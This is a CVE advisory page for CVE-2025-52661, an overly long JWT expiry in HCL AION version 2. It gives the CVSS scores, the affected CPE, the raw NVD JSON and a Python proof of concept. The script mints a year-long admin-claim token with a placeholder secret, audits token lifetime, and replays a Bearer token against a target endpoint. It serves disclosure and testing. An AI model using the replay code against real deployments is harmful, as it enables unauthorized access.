Security Vulnerability Report
CVE-2025-52661 CVSS 2.4 LOW

CVE-2025-52661

Published: 2026-01-19 18:16:04
Last Modified: 2026-04-25 18:04:39

Description

HCL AION version 2 is affected by a JWT Token Expiry Too Long vulnerability (classified as CWE-613 in the weakness entry of the raw JSON below). This may increase the risk of token misuse, potentially resulting in unauthorized access if the token is compromised.

CVSS Details

CVSS Score
2.4
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N (vendor-sourced secondary metric; the NVD primary metric in the raw JSON below scores 5.3 MEDIUM with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

Configurations (Affected Products)

cpe:2.3:a:hcltech:aion:2.0.0:*:*:*:*:*:*:* - VULNERABLE
HCL AION version 2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
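#!/usr/bin/env python3
"""
CVE-2025-52661 PoC - HCL AION JWT Token Expiry Too Long

Demonstrates the vulnerability class locally: a signed JWT whose ``exp``
claim lies far in the future (CWE-613 per the advisory metadata) stays
usable for that whole window, so any copy of the token that leaks remains
valid long after a session should have ended.

Minting or verifying a token requires the signing secret, so on its own the
script cannot confirm the issue against a live instance; ``check_token_expiry``
can be pointed at any token/key pair to audit the lifetime actually issued.
Remediation for this class is a short access-token lifetime combined with
refresh/revocation on the server side; see the vendor advisory for details.

Note: This is for educational and authorized testing purposes only.
"""
import datetime
import sys

import jwt
import requests

# Lifetimes are in days. The first reproduces the vulnerable configuration;
# the second is the audit threshold used by ``check_token_expiry``.
DEFAULT_TOKEN_LIFETIME_DAYS = 365
MAX_ACCEPTABLE_DAYS = 30
UTC = datetime.timezone.utc


def _utc_now():
    """Return the current time as a timezone-aware UTC datetime."""
    return datetime.datetime.now(UTC)


def generate_long_expiry_token(secret_key, user_claims, lifetime_days=DEFAULT_TOKEN_LIFETIME_DAYS):
    """
    Generate an HS256-signed JWT whose ``exp`` lies ``lifetime_days`` ahead.

    With the default of 365 days this reproduces the vulnerable token shape.

    Args:
        secret_key: HMAC secret used to sign the token.
        user_claims: Mapping with optional ``sub``, ``name`` and ``roles``
            keys; missing keys fall back to ``'unknown'`` / ``[]``.
        lifetime_days: Days until the token expires.

    Returns:
        The encoded token as returned by ``jwt.encode``.
    """
    issued_at = _utc_now()
    payload = {
        'sub': user_claims.get('sub', 'unknown'),
        'name': user_claims.get('name', 'unknown'),
        'iat': issued_at,
        # VULNERABLE: far longer than a session should stay valid.
        'exp': issued_at + datetime.timedelta(days=lifetime_days),
        'roles': user_claims.get('roles', []),
    }
    return jwt.encode(payload, secret_key, algorithm='HS256')


def check_token_expiry(token, secret_key, max_days=MAX_ACCEPTABLE_DAYS):
    """
    Report the remaining lifetime of ``token`` and flag it if excessive.

    Args:
        token: Encoded JWT to inspect.
        secret_key: HMAC secret the token was signed with.
        max_days: Largest remaining lifetime, in whole days, still accepted.

    Returns:
        True when the remaining lifetime exceeds ``max_days`` or the token
        carries no ``exp`` claim at all (it never expires); False when the
        lifetime is acceptable or the token cannot be decoded.
    """
    try:
        # Pinning ``algorithms`` stops the verifier from honouring whatever
        # algorithm the token header names; signature and ``exp`` are
        # checked by default.
        decoded = jwt.decode(token, secret_key, algorithms=['HS256'])
    except jwt.ExpiredSignatureError:
        print("[-] Token has expired")
        return False
    except jwt.InvalidTokenError as e:
        # Bad signature, malformed token or invalid claim values; the
        # original caught ``Exception`` and so also masked programming errors.
        print(f"[-] Error decoding token: {e}")
        return False

    print(f"Token Subject: {decoded.get('sub')}")

    exp_claim = decoded.get('exp')
    if exp_claim is None:
        # No expiry at all is the extreme case of the weakness being audited.
        print("[!] VULNERABLE: Token carries no exp claim and never expires")
        return True

    # ``exp`` is a POSIX timestamp, i.e. UTC. Both sides of the subtraction
    # are aware UTC datetimes; mixing a local-time fromtimestamp() with
    # utcnow() (as the original did) skews the result by the host's UTC offset.
    exp_time = datetime.datetime.fromtimestamp(exp_claim, tz=UTC)
    remaining = exp_time - _utc_now()
    print(f"Token Expiry: {exp_time}")
    print(f"Time until expiry: {remaining.days} days")

    if remaining.days > max_days:
        print(f"[!] VULNERABLE: Token expiry is too long (> {max_days} days)")
        return True
    print("[+] SECURE: Token expiry is within acceptable range")
    return False


def simulate_token_misuse(token, target_url):
    """
    Send one authenticated GET to ``target_url`` using ``token`` as a Bearer
    credential and report whether the server accepted it.

    A 200 response from a token issued long ago illustrates the exposure
    window created by the extended validity.

    Args:
        token: Encoded JWT to present.
        target_url: Endpoint to request.

    Returns:
        True on HTTP 200, False on any other status or a transport error.
    """
    headers = {
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json',
    }
    try:
        response = requests.get(target_url, headers=headers, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {e}")
        return False

    print(f"[*] Request to {target_url}")
    print(f"[*] Response Status: {response.status_code}")
    if response.status_code == 200:
        print("[!] Successfully authenticated with long-lived token")
        print("[!] This demonstrates the risk of extended token validity")
        return True
    print(f"[-] Request failed: {response.text}")
    return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-52661 PoC - HCL AION JWT Token Expiry Vulnerability")
    print("=" * 60)

    # Configuration. The secret is a placeholder: the demonstration only
    # proves the token *shape*; without the real signing key nothing minted
    # here is accepted by an actual deployment.
    SECRET_KEY = "your_secret_key_here"  # Replace with actual secret
    TARGET_URL = "https://target-aion-instance/api/protected-endpoint"

    # Claims used for the locally minted token.
    user_claims = {
        'sub': 'admin_user',
        'name': 'Admin User',
        'roles': ['admin', 'user'],
    }

    print("\n[*] Generating JWT token with extended expiry...")
    token = generate_long_expiry_token(SECRET_KEY, user_claims)
    print(f"[*] Generated Token: {token[:50]}...")

    print("\n[*] Analyzing token expiry...")
    is_vulnerable = check_token_expiry(token, SECRET_KEY)

    if is_vulnerable:
        print("\n[!] VULNERABILITY CONFIRMED:")
        print(" - Token has extended validity period")
        print(" - Increased risk of token misuse if compromised")
        print(" - Attacker has larger time window for exploitation")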

References

Vendor Advisory: https://support.hcl-software.com/kb_view.do?sys_kb_id=4b92474633de7ad4159a05273e5c7b4b&searchTerm=kb0127995#
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52661", "sourceIdentifier": "[email protected]", "published": "2026-01-19T18:16:03.933", "lastModified": "2026-04-25T18:04:38.990", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL AION version 2 is affected by a JWT Token Expiry Too Long vulnerability. This may increase the risk of token misuse, potentially resulting in unauthorized access if the token is compromised."}, {"lang": "es", "value": "HCL AION versión 2 está afectada por una vulnerabilidad de JWT Token Expiry Too Long. Esto puede aumentar el riesgo de uso indebido del token, lo que podría resultar en acceso no autorizado si el token se ve comprometido."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:aion:2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "BEBB7E38-04AE-436B-8F21-65FF3CA3CECC"}]}]}], 
"references": [{"url": "https://support.hcl-software.com/kb_view.do?sys_kb_id=4b92474633de7ad4159a05273e5c7b4b&searchTerm=kb0127995#", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}